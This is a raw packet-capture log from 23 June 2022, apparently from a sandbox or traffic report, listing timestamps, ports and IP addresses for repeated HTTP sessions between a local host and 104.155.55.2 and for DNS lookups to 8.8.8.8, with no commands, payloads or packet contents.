                                    Jun 23, 2022 18:08:56.994452953 CEST8049773104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:56.994525909 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:56.994774103 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:57.028558016 CEST8049773104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:59.768060923 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:59.802098036 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:59.802218914 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:59.805159092 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:59.839077950 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:59.839162111 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:59.873013973 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:00.835938931 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:00.835987091 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:00.836185932 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:00.836644888 CEST4977580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:00.870397091 CEST8049775104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.024712086 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:02.058655024 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.059284925 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:02.062352896 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:02.096235991 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.096342087 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:02.130377054 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.967256069 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.967312098 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:02.967487097 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:02.967550039 CEST4977680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:03.001336098 CEST8049776104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:04.316778898 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:04.351113081 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:04.351218939 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:04.362565994 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:04.397305012 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:04.397391081 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:04.431448936 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:05.276468039 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:05.276547909 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:05.276671886 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:05.276828051 CEST4977780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:05.310787916 CEST8049777104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:06.438606977 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:06.472807884 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:06.474766970 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:06.486196995 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:06.520467043 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:06.520549059 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:06.554550886 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:07.428229094 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:07.428267956 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:07.428339005 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:07.428371906 CEST4977880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:07.463177919 CEST8049778104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:08.879601002 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:08.913788080 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:08.915004015 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:08.917855024 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:08.952081919 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:08.955996990 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:08.990256071 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:09.874479055 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:09.874525070 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:09.874622107 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:09.874656916 CEST4978080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:09.908881903 CEST8049780104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:10.978935957 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.013024092 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:11.013176918 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.023803949 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.058080912 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:11.058202028 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.092519045 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:11.937966108 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:11.938011885 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:11.938102007 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.938159943 CEST4978180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:11.972368956 CEST8049781104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:13.228524923 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:13.263947010 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:13.264070034 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:13.286094904 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:13.320435047 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:13.320576906 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:13.354844093 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:14.166476965 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:14.166529894 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:14.166637897 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:14.166686058 CEST4978380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:14.200721979 CEST8049783104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:17.455087900 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:17.489192963 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:17.489347935 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:17.520239115 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:17.555042028 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:17.555152893 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:17.589354038 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:18.447312117 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:18.447329044 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:18.447422028 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:18.447491884 CEST4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:18.482357979 CEST8049787104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:20.044555902 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:20.079665899 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:20.079874039 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:20.096904993 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:20.131004095 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:20.131086111 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:20.168175936 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018222094 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018258095 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018326998 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:21.018357992 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:21.052544117 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.027339935 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.061429024 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.061577082 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.064496040 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.098742962 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.098875999 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.132890940 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916759968 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916778088 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916857004 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.916872025 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.951831102 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.713958025 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.748146057 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.748258114 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.755281925 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.791048050 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.791141033 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.825504065 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697077990 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697105885 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697235107 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:28.697547913 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:28.732095003 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:30.958607912 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:30.991812944 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:30.991926908 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:30.995615005 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.028739929 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.028866053 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.061784029 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916398048 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916446924 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916629076 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.916652918 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.949965954 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.730859995 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.765202045 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.765324116 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.768062115 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.802275896 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.802442074 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.836610079 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680341005 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680402040 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680484056 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:37.714603901 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.895617962 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.929912090 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.930048943 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.932837009 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.967029095 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.967153072 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.001388073 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794326067 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794369936 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794493914 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.795568943 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.829607010 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.586972952 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.621264935 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.621416092 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.624965906 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.659430027 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.662164927 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.696440935 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532793999 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532834053 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532926083 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:48.532978058 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:48.567070007 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.707495928 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.742337942 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.742634058 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.746968985 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.781001091 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.781109095 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.814958096 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.667985916 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.668025017 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.668138981 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:56.668159962 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:56.702193975 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.690476894 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.724639893 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.725275040 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.728405952 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.762507915 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.762680054 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.796674013 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690473080 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690521002 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690613985 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:00.694233894 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:00.730204105 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.610014915 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.643873930 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.643984079 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.646769047 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.680876970 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.680988073 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.714720964 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550873041 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550899982 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550987005 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:04.551043034 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:04.584800959 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.822792053 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.856399059 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.856848001 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.859589100 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.893618107 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.894614935 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.927932024 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.706850052 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.706913948 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.707037926 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:06.707206964 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:06.740637064 CEST8049879104.155.55.2192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 23, 2022 18:10:09.565874100 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:09.599854946 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:09.600025892 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:09.603862047 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:09.637823105 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:09.637948036 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:09.673930883 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:10.533294916 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:10.533339024 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:10.533513069 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:10.590889931 CEST | 49892 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:10.625000954 CEST | 80 | 49892 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:14.577212095 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:14.612133026 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:14.612261057 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:14.615169048 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:14.650319099 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:14.650410891 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:14.684789896 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:15.552607059 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:15.552655935 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:15.552812099 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:15.553754091 CEST | 49895 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:15.587842941 CEST | 80 | 49895 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:16.376142979 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:16.409903049 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:16.410068989 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:16.412961960 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:16.446965933 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:16.447062016 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:16.480252028 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:17.418004036 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:17.418046951 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3
Jun 23, 2022 18:10:17.418145895 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:17.418268919 CEST | 49896 | 80 | 192.168.2.3 | 104.155.55.2
Jun 23, 2022 18:10:17.453047037 CEST | 80 | 49896 | 104.155.55.2 | 192.168.2.3

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 23, 2022 18:08:26.293118954 CEST | 55923 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:26.312437057 CEST | 53 | 55923 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:28.453790903 CEST | 57723 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:28.471168995 CEST | 53 | 57723 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:30.221090078 CEST | 58116 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:30.538393021 CEST | 53 | 58116 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:32.768384933 CEST | 57421 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:32.787852049 CEST | 53 | 57421 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:34.825259924 CEST | 49873 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:34.844963074 CEST | 53 | 49873 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:40.300507069 CEST | 53802 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:40.588601112 CEST | 53 | 53802 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:43.324750900 CEST | 65266 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:43.342576981 CEST | 53 | 65266 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:45.421000004 CEST | 49327 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:45.440124035 CEST | 53 | 49327 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:47.827784061 CEST | 64452 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:48.113367081 CEST | 53 | 64452 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:50.688333035 CEST | 58625 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:50.707300901 CEST | 53 | 58625 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:53.418184042 CEST | 52810 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:53.437299013 CEST | 53 | 52810 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:56.029740095 CEST | 50778 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:56.049185991 CEST | 53 | 50778 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:08:59.746954918 CEST | 59795 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:08:59.766767979 CEST | 53 | 59795 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:02.005883932 CEST | 59390 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:02.023513079 CEST | 53 | 59390 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:04.295727015 CEST | 64816 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:04.315396070 CEST | 53 | 64816 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:06.418101072 CEST | 64996 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:06.437319040 CEST | 53 | 64996 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:08.858531952 CEST | 52096 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:08.878333092 CEST | 53 | 52096 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:10.958097935 CEST | 60640 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:10.977695942 CEST | 53 | 60640 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:13.136251926 CEST | 63861 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:13.153110981 CEST | 53 | 63861 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:17.432912111 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:17.450462103 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:19.486244917 CEST | 62724 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:20.042426109 CEST | 53 | 62724 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:22.007802963 CEST | 64412 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:22.025185108 CEST | 53 | 64412 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:27.695745945 CEST | 62547 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:27.712416887 CEST | 53 | 62547 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:30.935127020 CEST | 57442 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:30.954468012 CEST | 53 | 57442 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:36.710115910 CEST | 52487 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:36.729382038 CEST | 53 | 52487 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:41.871608019 CEST | 58950 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:41.889441967 CEST | 53 | 58950 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:47.565593958 CEST | 59065 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:47.584813118 CEST | 53 | 59065 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:55.686777115 CEST | 64589 | 53 | 192.168.2.3 | 8.8.8.8
